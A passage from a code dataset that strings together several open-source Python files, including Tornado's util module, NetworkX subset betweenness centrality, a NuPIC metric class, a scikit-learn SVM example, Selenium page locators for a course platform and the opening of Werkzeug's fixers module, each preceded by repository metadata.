def contains_all_chars(orig, result):
return re.sub(spaces, '', orig) == re.sub(spaces, '', result)
sentences = [u'Quay Pegman qua bên trái hoặc bên phải 90 độ.',
u'Foo bar baz this is english that is okay bye.',
u'If there is a path in the specified direction, \nthen ' +
u'do some actions.',
u'If there is a path in the specified direction, then do ' +
u'the first block of actions. Otherwise, do the second ' +
u'block of actions.']
for sentence in sentences:
output = common.insert_breaks(sentence, 30, 50)
self.assert_(contains_all_chars(sentence, output),
u'Mismatch between:\n{0}\n{1}'.format(
re.sub(spaces, '', sentence),
re.sub(spaces, '', output)))
if __name__ == '__main__':
unittest.main()
|
kaushik94/tornado
|
refs/heads/master
|
tornado/util.py
|
102
|
"""Miscellaneous utility functions and classes.
This module is used internally by Tornado. It is not necessarily expected
that the functions and classes defined here will be useful to other
applications, but they are documented here in case they are.
The one public-facing part of this module is the `Configurable` class
and its `~Configurable.configure` method, which becomes a part of the
interface of its subclasses, including `.AsyncHTTPClient`, `.IOLoop`,
and `.Resolver`.
"""
from __future__ import absolute_import, division, print_function, with_statement
import array
import inspect
import os
import sys
import zlib
try:
xrange # py2
except NameError:
xrange = range # py3
class ObjectDict(dict):
"""Makes a dictionary behave like an object, with attribute-style access.
"""
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
self[name] = value
class GzipDecompressor(object):
"""Streaming gzip decompressor.
    The interface is like that of `zlib.decompressobj` (without some of the
    optional arguments), but it understands gzip headers and checksums.
"""
def __init__(self):
# Magic parameter makes zlib module understand gzip header
# http://stackoverflow.com/questions/1838699/how-can-i-decompress-a-gzip-stream-with-zlib
# This works on cpython and pypy, but not jython.
self.decompressobj = zlib.decompressobj(16 + zlib.MAX_WBITS)
def decompress(self, value, max_length=None):
"""Decompress a chunk, returning newly-available data.
Some data may be buffered for later processing; `flush` must
be called when there is no more input data to ensure that
all data was processed.
If ``max_length`` is given, some input data may be left over
in ``unconsumed_tail``; you must retrieve this value and pass
it back to a future call to `decompress` if it is not empty.
"""
        # zlib requires an integer max_length; treat None as 0 (no limit).
        return self.decompressobj.decompress(value, max_length or 0)
@property
def unconsumed_tail(self):
"""Returns the unconsumed portion left over
"""
return self.decompressobj.unconsumed_tail
def flush(self):
"""Return any remaining buffered data not yet returned by decompress.
Also checks for errors such as truncated input.
No other methods may be called on this object after `flush`.
"""
return self.decompressobj.flush()
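def _gzip_decompressor_example():
    # A minimal usage sketch, not part of the original module: decompress
    # gzip data produced with the stdlib gzip module, feeding it in chunks.
    import gzip
    import io
    buf = io.BytesIO()
    f = gzip.GzipFile(fileobj=buf, mode="wb")
    f.write(b"hello " * 1000)
    f.close()
    compressed = buf.getvalue()
    decompressor = GzipDecompressor()
    chunks = []
    for i in range(0, len(compressed), 64):
        # max_length=0 means "no limit" for the underlying zlib object.
        chunks.append(decompressor.decompress(compressed[i:i + 64], 0))
    chunks.append(decompressor.flush())  # also checks for truncated input
    assert b"".join(chunks) == b"hello " * 1000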
def import_object(name):
"""Imports an object by name.
import_object('x') is equivalent to 'import x'.
import_object('x.y.z') is equivalent to 'from x.y import z'.
>>> import tornado.escape
>>> import_object('tornado.escape') is tornado.escape
True
>>> import_object('tornado.escape.utf8') is tornado.escape.utf8
True
>>> import_object('tornado') is tornado
True
>>> import_object('tornado.missing_module')
Traceback (most recent call last):
...
ImportError: No module named missing_module
"""
if name.count('.') == 0:
return __import__(name, None, None)
parts = name.split('.')
obj = __import__('.'.join(parts[:-1]), None, None, [parts[-1]], 0)
try:
return getattr(obj, parts[-1])
except AttributeError:
raise ImportError("No module named %s" % parts[-1])
# Fake unicode literal support: Python 3.2 doesn't have the u'' marker for
# literal strings, and alternative solutions like "from __future__ import
# unicode_literals" have other problems (see PEP 414). u() can be applied
# to ascii strings that include \u escapes (but they must not contain
# literal non-ascii characters).
if type('') is not type(b''):
def u(s):
return s
unicode_type = str
basestring_type = str
else:
def u(s):
return s.decode('unicode_escape')
unicode_type = unicode
basestring_type = basestring
# Deprecated alias that was used before we dropped py25 support.
# Left here in case anyone outside Tornado is using it.
bytes_type = bytes
if sys.version_info > (3,):
exec("""
def raise_exc_info(exc_info):
raise exc_info[1].with_traceback(exc_info[2])
def exec_in(code, glob, loc=None):
if isinstance(code, str):
code = compile(code, '<string>', 'exec', dont_inherit=True)
exec(code, glob, loc)
""")
else:
exec("""
def raise_exc_info(exc_info):
raise exc_info[0], exc_info[1], exc_info[2]
def exec_in(code, glob, loc=None):
if isinstance(code, basestring):
# exec(string) inherits the caller's future imports; compile
# the string first to prevent that.
code = compile(code, '<string>', 'exec', dont_inherit=True)
exec code in glob, loc
""")
def errno_from_exception(e):
"""Provides the errno from an Exception object.
There are cases that the errno attribute was not set so we pull
the errno out of the args but if someone instantiates an Exception
without any args you will get a tuple error. So this function
abstracts all that behavior to give you a safe way to get the
errno.
"""
if hasattr(e, 'errno'):
return e.errno
elif e.args:
return e.args[0]
else:
return None
class Configurable(object):
"""Base class for configurable interfaces.
A configurable interface is an (abstract) class whose constructor
acts as a factory function for one of its implementation subclasses.
The implementation subclass as well as optional keyword arguments to
its initializer can be set globally at runtime with `configure`.
By using the constructor as the factory method, the interface
looks like a normal class, `isinstance` works as usual, etc. This
pattern is most useful when the choice of implementation is likely
to be a global decision (e.g. when `~select.epoll` is available,
always use it instead of `~select.select`), or when a
previously-monolithic class has been split into specialized
subclasses.
Configurable subclasses must define the class methods
`configurable_base` and `configurable_default`, and use the instance
method `initialize` instead of ``__init__``.
"""
__impl_class = None
__impl_kwargs = None
def __new__(cls, **kwargs):
base = cls.configurable_base()
args = {}
if cls is base:
impl = cls.configured_class()
if base.__impl_kwargs:
args.update(base.__impl_kwargs)
else:
impl = cls
args.update(kwargs)
instance = super(Configurable, cls).__new__(impl)
# initialize vs __init__ chosen for compatibility with AsyncHTTPClient
# singleton magic. If we get rid of that we can switch to __init__
# here too.
instance.initialize(**args)
return instance
@classmethod
def configurable_base(cls):
"""Returns the base class of a configurable hierarchy.
        This will normally return the class in which it is defined
        (which is *not* necessarily the same as the cls classmethod parameter).
"""
raise NotImplementedError()
@classmethod
def configurable_default(cls):
"""Returns the implementation class to be used if none is configured."""
raise NotImplementedError()
def initialize(self):
"""Initialize a `Configurable` subclass instance.
Configurable classes should use `initialize` instead of ``__init__``.
"""
@classmethod
def configure(cls, impl, **kwargs):
"""Sets the class to use when the base class is instantiated.
Keyword arguments will be saved and added to the arguments passed
to the constructor. This can be used to set global defaults for
some parameters.
"""
base = cls.configurable_base()
if isinstance(impl, (unicode_type, bytes)):
impl = import_object(impl)
if impl is not None and not issubclass(impl, cls):
raise ValueError("Invalid subclass of %s" % cls)
base.__impl_class = impl
base.__impl_kwargs = kwargs
@classmethod
def configured_class(cls):
"""Returns the currently configured class."""
base = cls.configurable_base()
if cls.__impl_class is None:
base.__impl_class = cls.configurable_default()
return base.__impl_class
@classmethod
def _save_configuration(cls):
base = cls.configurable_base()
return (base.__impl_class, base.__impl_kwargs)
@classmethod
def _restore_configuration(cls, saved):
base = cls.configurable_base()
base.__impl_class = saved[0]
base.__impl_kwargs = saved[1]
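def _configurable_example():
    # A minimal, illustrative sketch of the Configurable pattern described
    # above; the Greeter classes are hypothetical and not part of Tornado.
    class Greeter(Configurable):
        @classmethod
        def configurable_base(cls):
            return Greeter
        @classmethod
        def configurable_default(cls):
            return PlainGreeter
        def initialize(self, name="world"):
            self.name = name
    class PlainGreeter(Greeter):
        def greet(self):
            return "hello %s" % self.name
    class LoudGreeter(Greeter):
        def greet(self):
            return "HELLO %s!" % self.name.upper()
    # Instantiating the base returns the configured implementation subclass.
    assert isinstance(Greeter(), PlainGreeter)
    Greeter.configure(LoudGreeter, name="tornado")
    assert Greeter().greet() == "HELLO TORNADO!"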
class ArgReplacer(object):
"""Replaces one value in an ``args, kwargs`` pair.
Inspects the function signature to find an argument by name
whether it is passed by position or keyword. For use in decorators
and similar wrappers.
"""
def __init__(self, func, name):
self.name = name
try:
self.arg_pos = inspect.getargspec(func).args.index(self.name)
except ValueError:
# Not a positional parameter
self.arg_pos = None
def get_old_value(self, args, kwargs, default=None):
"""Returns the old value of the named argument without replacing it.
Returns ``default`` if the argument is not present.
"""
if self.arg_pos is not None and len(args) > self.arg_pos:
return args[self.arg_pos]
else:
return kwargs.get(self.name, default)
def replace(self, new_value, args, kwargs):
"""Replace the named argument in ``args, kwargs`` with ``new_value``.
Returns ``(old_value, args, kwargs)``. The returned ``args`` and
``kwargs`` objects may not be the same as the input objects, or
the input objects may be mutated.
If the named argument was not found, ``new_value`` will be added
to ``kwargs`` and None will be returned as ``old_value``.
"""
if self.arg_pos is not None and len(args) > self.arg_pos:
# The arg to replace is passed positionally
old_value = args[self.arg_pos]
args = list(args) # *args is normally a tuple
args[self.arg_pos] = new_value
else:
# The arg to replace is either omitted or passed by keyword.
old_value = kwargs.get(self.name)
kwargs[self.name] = new_value
return old_value, args, kwargs
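def _arg_replacer_example():
    # Illustrative sketch (the fetch function is hypothetical): ArgReplacer
    # swaps the ``callback`` argument whether it was passed positionally or
    # by keyword.
    def fetch(url, callback=None):
        return url, callback
    replacer = ArgReplacer(fetch, 'callback')
    old, args, kwargs = replacer.replace('new_cb', ('http://example.com', 'old_cb'), {})
    assert old == 'old_cb' and args[1] == 'new_cb'
    old, args, kwargs = replacer.replace('new_cb', ('http://example.com',), {'callback': 'old_cb'})
    assert old == 'old_cb' and kwargs['callback'] == 'new_cb'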
def timedelta_to_seconds(td):
"""Equivalent to td.total_seconds() (introduced in python 2.7)."""
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) / float(10 ** 6)
def _websocket_mask_python(mask, data):
"""Websocket masking function.
`mask` is a `bytes` object of length 4; `data` is a `bytes` object of any length.
Returns a `bytes` object of the same length as `data` with the mask applied
as specified in section 5.3 of RFC 6455.
This pure-python implementation may be replaced by an optimized version when available.
"""
mask = array.array("B", mask)
unmasked = array.array("B", data)
for i in xrange(len(data)):
unmasked[i] = unmasked[i] ^ mask[i % 4]
if hasattr(unmasked, 'tobytes'):
# tostring was deprecated in py32. It hasn't been removed,
# but since we turn on deprecation warnings in our tests
# we need to use the right one.
return unmasked.tobytes()
else:
return unmasked.tostring()
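def _websocket_mask_example():
    # Minimal sketch: masking is a plain XOR, so applying the same 4-byte
    # mask twice round-trips back to the original payload (RFC 6455, 5.3).
    mask = b"\x01\x02\x03\x04"
    data = b"hello websocket"
    masked = _websocket_mask_python(mask, data)
    assert _websocket_mask_python(mask, masked) == data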
if (os.environ.get('TORNADO_NO_EXTENSION') or
os.environ.get('TORNADO_EXTENSION') == '0'):
# These environment variables exist to make it easier to do performance
# comparisons; they are not guaranteed to remain supported in the future.
_websocket_mask = _websocket_mask_python
else:
try:
from tornado.speedups import websocket_mask as _websocket_mask
except ImportError:
if os.environ.get('TORNADO_EXTENSION') == '1':
raise
_websocket_mask = _websocket_mask_python
def doctests():
import doctest
return doctest.DocTestSuite()
|
arhik/nupic
|
refs/heads/master
|
src/nupic/research/monitor_mixin/metric.py
|
50
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2014, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Metric class used in monitor mixin framework.
"""
import numpy
class Metric(object):
"""
A metric computed over a set of data (usually from a `CountsTrace`).
"""
def __init__(self, monitor, title, data):
"""
@param monitor (MonitorMixinBase) Monitor Mixin instance that generated
this trace
@param title (string) Title
@param data (list) List of numbers to compute metric from
"""
self.monitor = monitor
self.title = title
self.min = None
self.max = None
self.sum = None
self.mean = None
self.standardDeviation = None
self._computeStats(data)
@staticmethod
def createFromTrace(trace, excludeResets=None):
data = list(trace.data)
if excludeResets is not None:
data = [x for i, x in enumerate(trace.data) if not excludeResets.data[i]]
return Metric(trace.monitor, trace.title, data)
def copy(self):
metric = Metric(self.monitor, self.title, [])
metric.min = self.min
metric.max = self.max
metric.sum = self.sum
metric.mean = self.mean
metric.standardDeviation = self.standardDeviation
return metric
def prettyPrintTitle(self):
return ("[{0}] {1}".format(self.monitor.mmName, self.title)
if self.monitor.mmName is not None else self.title)
def _computeStats(self, data):
if not len(data):
return
self.min = min(data)
self.max = max(data)
self.sum = sum(data)
self.mean = numpy.mean(data)
self.standardDeviation = numpy.std(data)
def getStats(self, sigFigs=7):
if self.mean is None:
return [None, None, None, None, None]
return [round(self.mean, sigFigs),
round(self.standardDeviation, sigFigs),
round(self.min, sigFigs),
round(self.max, sigFigs),
round(self.sum, sigFigs)]
|
dhimmel/networkx
|
refs/heads/master
|
networkx/algorithms/centrality/betweenness_subset.py
|
20
|
"""
Betweenness centrality measures for subsets of nodes.
"""
# Copyright (C) 2004-2015 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
__author__ = """Aric Hagberg (hagberg@lanl.gov)"""
__all__ = ['betweenness_centrality_subset',
'edge_betweenness_centrality_subset',
'betweenness_centrality_source']
import networkx as nx
from networkx.algorithms.centrality.betweenness import\
_single_source_dijkstra_path_basic as dijkstra
from networkx.algorithms.centrality.betweenness import\
_single_source_shortest_path_basic as shortest_path
def betweenness_centrality_subset(G,sources,targets,
normalized=False,
weight=None):
"""Compute betweenness centrality for a subset of nodes.
.. math::
c_B(v) =\sum_{s\in S, t \in T} \frac{\sigma(s, t|v)}{\sigma(s, t)}
where `S` is the set of sources, `T` is the set of targets,
`\sigma(s, t)` is the number of shortest `(s, t)`-paths,
and `\sigma(s, t|v)` is the number of those paths
passing through some node `v` other than `s, t`.
If `s = t`, `\sigma(s, t) = 1`,
and if `v \in {s, t}`, `\sigma(s, t|v) = 0` [2]_.
Parameters
----------
G : graph
sources: list of nodes
Nodes to use as sources for shortest paths in betweenness
targets: list of nodes
Nodes to use as targets for shortest paths in betweenness
normalized : bool, optional
      If True the betweenness values are normalized by `2/((n-1)(n-2))`
      for undirected graphs, and `1/((n-1)(n-2))` for directed graphs where `n`
is the number of nodes in G.
weight : None or string, optional
If None, all edge weights are considered equal.
Otherwise holds the name of the edge attribute used as weight.
Returns
-------
nodes : dictionary
Dictionary of nodes with betweenness centrality as the value.
See Also
--------
edge_betweenness_centrality
load_centrality
Notes
-----
The basic algorithm is from [1]_.
For weighted graphs the edge weights must be greater than zero.
Zero edge weights can produce an infinite number of equal length
paths between pairs of nodes.
The normalization might seem a little strange but it is the same
as in betweenness_centrality() and is designed to make
betweenness_centrality(G) be the same as
betweenness_centrality_subset(G,sources=G.nodes(),targets=G.nodes()).
References
----------
.. [1] Ulrik Brandes, A Faster Algorithm for Betweenness Centrality.
Journal of Mathematical Sociology 25(2):163-177, 2001.
http://www.inf.uni-konstanz.de/algo/publications/b-fabc-01.pdf
.. [2] Ulrik Brandes: On Variants of Shortest-Path Betweenness
Centrality and their Generic Computation.
Social Networks 30(2):136-145, 2008.
http://www.inf.uni-konstanz.de/algo/publications/b-vspbc-08.pdf
"""
b=dict.fromkeys(G,0.0) # b[v]=0 for v in G
for s in sources:
# single source shortest paths
if weight is None: # use BFS
S,P,sigma=shortest_path(G,s)
else: # use Dijkstra's algorithm
S,P,sigma=dijkstra(G,s,weight)
b=_accumulate_subset(b,S,P,sigma,s,targets)
b=_rescale(b,len(G),normalized=normalized,directed=G.is_directed())
return b
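# Illustrative usage (not part of the original module):
#   >>> G = nx.path_graph(5)   # 0 - 1 - 2 - 3 - 4
#   >>> betweenness_centrality_subset(G, sources=[0], targets=[4])
# Only the interior nodes 1, 2 and 3 lie on the single 0-4 shortest path, so
# they receive equal, nonzero scores while the endpoints score 0.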
def edge_betweenness_centrality_subset(G,sources,targets,
normalized=False,
weight=None):
"""Compute betweenness centrality for edges for a subset of nodes.
.. math::
c_B(v) =\sum_{s\in S,t \in T} \frac{\sigma(s, t|e)}{\sigma(s, t)}
where `S` is the set of sources, `T` is the set of targets,
`\sigma(s, t)` is the number of shortest `(s, t)`-paths,
and `\sigma(s, t|e)` is the number of those paths
passing through edge `e` [2]_.
Parameters
----------
G : graph
A networkx graph
sources: list of nodes
Nodes to use as sources for shortest paths in betweenness
targets: list of nodes
Nodes to use as targets for shortest paths in betweenness
normalized : bool, optional
      If True the betweenness values are normalized by `2/(n(n-1))`
      for undirected graphs, and `1/(n(n-1))` for directed graphs where `n`
is the number of nodes in G.
weight : None or string, optional
If None, all edge weights are considered equal.
Otherwise holds the name of the edge attribute used as weight.
Returns
-------
edges : dictionary
Dictionary of edges with Betweenness centrality as the value.
See Also
--------
betweenness_centrality
edge_load
Notes
-----
The basic algorithm is from [1]_.
For weighted graphs the edge weights must be greater than zero.
Zero edge weights can produce an infinite number of equal length
paths between pairs of nodes.
The normalization might seem a little strange but it is the same
as in edge_betweenness_centrality() and is designed to make
edge_betweenness_centrality(G) be the same as
edge_betweenness_centrality_subset(G,sources=G.nodes(),targets=G.nodes()).
References
----------
.. [1] Ulrik Brandes, A Faster Algorithm for Betweenness Centrality.
Journal of Mathematical Sociology 25(2):163-177, 2001.
http://www.inf.uni-konstanz.de/algo/publications/b-fabc-01.pdf
.. [2] Ulrik Brandes: On Variants of Shortest-Path Betweenness
Centrality and their Generic Computation.
Social Networks 30(2):136-145, 2008.
http://www.inf.uni-konstanz.de/algo/publications/b-vspbc-08.pdf
"""
b=dict.fromkeys(G,0.0) # b[v]=0 for v in G
b.update(dict.fromkeys(G.edges(),0.0)) # b[e] for e in G.edges()
for s in sources:
# single source shortest paths
if weight is None: # use BFS
S,P,sigma=shortest_path(G,s)
else: # use Dijkstra's algorithm
S,P,sigma=dijkstra(G,s,weight)
b=_accumulate_edges_subset(b,S,P,sigma,s,targets)
for n in G: # remove nodes to only return edges
del b[n]
b=_rescale_e(b,len(G),normalized=normalized,directed=G.is_directed())
return b
# obsolete name
def betweenness_centrality_source(G,normalized=True,weight=None,sources=None):
if sources is None:
sources=G.nodes()
targets=G.nodes()
return betweenness_centrality_subset(G,sources,targets,normalized,weight)
def _accumulate_subset(betweenness,S,P,sigma,s,targets):
delta=dict.fromkeys(S,0)
target_set=set(targets)
while S:
w=S.pop()
for v in P[w]:
if w in target_set:
delta[v]+=(sigma[v]/sigma[w])*(1.0+delta[w])
else:
delta[v]+=delta[w]/len(P[w])
if w != s:
betweenness[w]+=delta[w]
return betweenness
def _accumulate_edges_subset(betweenness,S,P,sigma,s,targets):
delta=dict.fromkeys(S,0)
target_set=set(targets)
while S:
w=S.pop()
for v in P[w]:
if w in target_set:
c=(sigma[v]/sigma[w])*(1.0+delta[w])
else:
c=delta[w]/len(P[w])
if (v,w) not in betweenness:
betweenness[(w,v)]+=c
else:
betweenness[(v,w)]+=c
delta[v]+=c
if w != s:
betweenness[w]+=delta[w]
return betweenness
def _rescale(betweenness,n,normalized,directed=False):
if normalized is True:
if n <=2:
scale=None # no normalization b=0 for all nodes
else:
scale=1.0/((n-1)*(n-2))
else: # rescale by 2 for undirected graphs
if not directed:
scale=1.0/2.0
else:
scale=None
if scale is not None:
for v in betweenness:
betweenness[v] *= scale
return betweenness
def _rescale_e(betweenness,n,normalized,directed=False):
if normalized is True:
if n <=1:
scale=None # no normalization b=0 for all nodes
else:
scale=1.0/(n*(n-1))
else: # rescale by 2 for undirected graphs
if not directed:
scale=1.0/2.0
else:
scale=None
if scale is not None:
for v in betweenness:
betweenness[v] *= scale
return betweenness
|
memtoko/django
|
refs/heads/master
|
tests/i18n/other/locale/de/__init__.py
|
12133432
| |
GunnerJnr/_CodeInstitute
|
refs/heads/master
|
Stream-3/Full-Stack-Development/2.Hello-Django-Templates/3.Template-Inheritance/hello_django/HelloWorld_prj/HelloWorld_app/__init__.py
|
12133432
| |
rahuldhote/scikit-learn
|
refs/heads/master
|
examples/svm/plot_svm_nonlinear.py
|
268
|
"""
==============
Non-linear SVM
==============
Perform binary classification using non-linear SVC
with RBF kernel. The target to predict is a XOR of the
inputs.
The color map illustrates the decision function learned by the SVC.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm
xx, yy = np.meshgrid(np.linspace(-3, 3, 500),
np.linspace(-3, 3, 500))
np.random.seed(0)
X = np.random.randn(300, 2)
Y = np.logical_xor(X[:, 0] > 0, X[:, 1] > 0)
# fit the model
clf = svm.NuSVC()
clf.fit(X, Y)
# plot the decision function for each datapoint on the grid
Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.imshow(Z, interpolation='nearest',
extent=(xx.min(), xx.max(), yy.min(), yy.max()), aspect='auto',
origin='lower', cmap=plt.cm.PuOr_r)
contours = plt.contour(xx, yy, Z, levels=[0], linewidths=2,
                       linestyles='--')
plt.scatter(X[:, 0], X[:, 1], s=30, c=Y, cmap=plt.cm.Paired)
plt.xticks(())
plt.yticks(())
plt.axis([-3, 3, -3, 3])
plt.show()
|
teemulehtinen/a-plus
|
refs/heads/master
|
selenium_test/test/locators.py
|
2
|
from selenium.webdriver.common.by import By
class LoginPageLocators(object):
BANNER = (By.XPATH, "//*[@class='page-header']/h1[contains(text(), 'Login')]")
USERNAME_INPUT = (By.XPATH, "//input[@id='id_username']")
PASSWORD_INPUT = (By.XPATH, "//input[@id='id_password']")
SUBMIT_BUTTON = (By.XPATH, "//*[@type='submit']")
class FirstPageLocators(object):
BANNER = (By.XPATH, "//*[@class='page-header']/h1")
APLUS_TEST_COURSE_INSTANCE_BUTTON = (By.XPATH, "//h3/a[contains(@href, '/aplus1/basic_instance/')]")
HOOK_EXAMPLE_BUTTON = (By.XPATH, "//h3/a[contains(@href, '/aplus1/hook_instance/')]")
class BasePageLocators(object):
COURSE_BANNER = (By.XPATH, "//*[@id='bs-navbar-collapse']/ul[1]/li[1]/a")
FOOTER = (By.XPATH, "//nav[contains(@class, 'site-footer')]")
HOME_LINK = (By.XPATH, "//*[contains(@class, 'course-menu')]/ul/li[contains(@class, 'menu-home')]/a")
CALENDAR_FEED_LINK = (By.XPATH, "//*[contains(@class, 'calendar-view')]/p/a[contains(@href, '/export-calendar/')]")
RESULTS_LINK = (By.XPATH, "//*[contains(@class, 'course-menu')]/ul/li[contains(@class, 'menu-results')]/a")
USER_LINK = (By.XPATH, "//*[contains(@class, 'course-menu')]/ul/li[contains(@class, 'menu-notifications')]/a")
TEACHERS_VIEW_LINK = (By.XPATH, "//*[contains(@class, 'course-menu')]/ul/li[contains(@class, 'menu-edit-course')]/a")
LOGGED_USER_LINK = (By.XPATH, "//*[contains(@class, 'user-menu')]/li[contains(@class, 'menu-profile')]/a")
LOGOUT_LINK = (By.XPATH, "//*[contains(@class, 'user-menu')]/li/a[contains(@href, '/accounts/logout/')]")
LOGOUT_BANNER = (By.XPATH, "//div[contains(@class, 'alert alert-success')]")
WARNING_BANNER = (By.XPATH, "//div[contains(@class, 'alert alert-warning')]")
NOTIFICATION_ALERT = (By.XPATH, "//*[contains(@class, 'menu-notification')]//span[contains(@class, 'badge-danger')]")
class HomePageLocators(object):
MAIN_SCORE = (By.XPATH, "//div[contains(@class, 'well')]/p/strong[contains(@class, 'h2')]")
class ExercisePageLocators(object):
MAIN_TITLE = (By.XPATH, "//*[@id='title']")
EXERCISE_SCORE = (By.XPATH, "//*[@id='exercise-info']/div[@class='well']/p/strong[contains(@class, 'h2')]")
NUMBER_OF_SUBMITTERS = (By.XPATH, "//*[@id='exercise-info']//dl/dd[contains(@class, 'exercise-info-submitters')]")
ALLOWED_SUBMISSIONS = (By.XPATH, "//*[@id='exercise-info']//dl/dd[contains(@class, 'exercise-info-submissions')]")
MY_SUBMISSIONS_LIST = (By.XPATH, "//li[contains(@class, 'menu-submission')]/ul[@class='dropdown-menu']/li")
RECEIVED_BANNER = (By.XPATH, "//*[contains(@class, 'alert')]")
class CourseArchiveLocators(object):
APLUS_LINK = (By.XPATH, "//*[@id='course1']/ul/li/a[contains(@href, '/aplus1/basic_instance/')]")
HOOK_LINK = (By.XPATH, "//*[@id='course1']/ul/li/a[contains(@href, '/aplus1/hook_instance/')]")
class StaffPageLocators(object):
SUBMISSION_LINKS = (By.XPATH, "//a[@href='/aplus1/basic_instance/first-exercise-round/1/submissions/']")
class TeachersPageLocators(object):
TEACHERS_VIEW_BANNER = (By.XPATH, "//ol[@class='breadcrumb']/li[@class='active' and contains(text(), 'Edit course')]")
EDIT_LEARNING_MODULE_LINKS = (By.XPATH, "//a[contains(@href,'/aplus1/basic_instance/teachers/exercise/1/')]")
REMOVE_LEARNING_MODULE_LINKS = (By.XPATH, "//a[contains(@href,'/aplus1/basic_instance/teachers/exercise/1/delete/')]")
class EditModulePageLocators(object):
EDIT_MODULE_PAGE_BANNER = (By.XPATH, "//ol[@class='breadcrumb']/li[@class='active' and contains(text(), 'Edit module')]")
COURSE_NAME_INPUT = (By.XPATH, "//*[@id='id_name']")
POINTS_TO_PASS_INPUT = (By.XPATH, "//*[@id='id_points_to_pass']")
OPENING_TIME_INPUT = (By.XPATH, "//*[@id='id_opening_time']")
CLOSING_TIME_INPUT = (By.XPATH, "//*[@id='id_closing_time']")
SUBMIT_BUTTON = (By.XPATH, "//form//*[@type='submit']")
SUCCESSFUL_SAVE_BANNER = (By.XPATH, "//div[contains(@class, 'site-content')]/div[contains(@class, 'alert alert-success')]")
class EditExercisePageLocators(object):
EDIT_EXERCISE_PAGE_BANNER = (By.XPATH, "//ol[@class='breadcrumb']/li[@class='active' and contains(text(), 'Edit learning object')]")
EXERCISE_NAME_INPUT = (By.XPATH, "//*[@id='id_name']")
MAX_SUBMISSIONS_INPUT = (By.XPATH, "//*[@id='id_max_submissions']")
MAX_POINTS_INPUT = (By.XPATH, "//*[@id='id_max_points']")
POINTS_TO_PASS_INPUT = (By.XPATH, "//*[@id='id_points_to_pass']")
SUBMIT_BUTTON = (By.XPATH, "//form//*[@type='submit']")
SUCCESSFUL_SAVE_BANNER = (By.XPATH, "//div[contains(@class, 'site-content')]/div[contains(@class, 'alert alert-success')]")
class SubmissionPageLocators(object):
SUBMISSIONS_PAGE_BANNER = (By.XPATH, "//ol[@class='breadcrumb']/li[@class='active' and contains(text(), 'All submissions')]")
INSPECTION_LINKS = (By.XPATH, "//table//a[contains(@href, '/inspect/')]")
class StudentFeedbackPageLocators(object):
ASSISTANT_FEEDBACK_LABEL = (By.XPATH, "//h4[text()='Assistant feedback']")
ASSISTANT_FEEDBACK_TEXT = (By.XPATH, "//blockquote")
FEEDBACK_TEXT = (By.XPATH, "//*[@id='exercise']")
class InspectionPageLocators(object):
ASSESS_THIS_SUBMISSION_LINK = (By.XPATH, "//*a[contains(@href, '/aplus1/basic_instance/exercises/1/submissions/7/assess/')]")
NO_FEEDBACK_BANNER = (By.XPATH, "//div[@class='alert alert-info']")
SUBMITTERS_TEXT = (By.XPATH, "//div[@class='panel-body']/dl/dd[1]")
GRADE_TEXT = (By.XPATH, "//div[@class='panel-body']/dl/dd[4]")
class AssessmentPageLocators(object):
POINTS_INPUT = (By.XPATH, "//*[@id='id_points']")
ASSISTANT_FEEDBACK_INPUT = (By.XPATH, "//*[@id='id_assistant_feedback']")
FEEDBACK_INPUT = (By.XPATH, "//*[@id='id_feedback']")
SAVE_BUTTON = (By.XPATH, "//form//*[@type='submit']")
class MyFirstExerciseLocators(object):
MAIN_TITLE = (By.XPATH, "//*[@id='title'][contains(text(), 'My first exercise')]")
TEXT_INPUT = (By.XPATH, "//*[@id='exercise-page-content']/form//textarea")
SUBMIT_BUTTON = (By.XPATH, "//*[@id='exercise-page-content']/form//input[@type='submit']")
class FileUploadGraderLocators(object):
MAIN_TITLE = (By.XPATH, "//*[@id='title'][contains(text(), 'File exercise')]")
BROWSE_BUTTON = (By.XPATH, "//*[@id='myfile_id']")
SUBMIT_BUTTON = (By.XPATH, "//*[@id='exercise-page-content']/form//input[@type='submit']")
class MyAjaxExerciseGraderLocators(object):
MAIN_TITLE = (By.XPATH, "//*[@id='title'][contains(text(), 'My AJAX exercise')]")
TEXT_INPUT = (By.XPATH, "//*[@id='form']//input[@type='number']")
SUBMIT_BUTTON = (By.XPATH, "//*[@id='form']//input[@type='submit']")
|
postlund/home-assistant
|
refs/heads/dev
|
homeassistant/components/enigma2/__init__.py
|
37
|
"""Support for Enigma2 devices."""
|
maxhawkins/random_diet_club
|
refs/heads/master
|
lib/werkzeug/contrib/fixers.py
|
4
|
# -*- coding: utf-8 -*-
"""
werkzeug.contrib.fixers
~~~~~~~~~~~~~~~~~~~~~~~
.. versionadded:: 0.5
This module includes various helpers that fix bugs in web servers. They may
be necessary for some versions of a buggy web server but not others. We try
    to stay updated with the status of the bugs as well as possible, but you
    have to check whether they fix the problem you encounter.
If you notice bugs in webservers not fixed in this module consider
contributing a patch.
:copyright: Copyright 2009 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from werkzeug.http import parse_options_header, parse_cache_control_header, \
parse_set_header
from werkzeug.useragents import UserAgent
from werkzeug.datastructures import Headers, ResponseCacheControl
class CGIRootFix(object):
"""Wrap the application in this middleware if you are using FastCGI or CGI
and you have problems with your app root being set to the cgi script's path
    instead of the path users are going to visit.
.. versionchanged:: 0.9
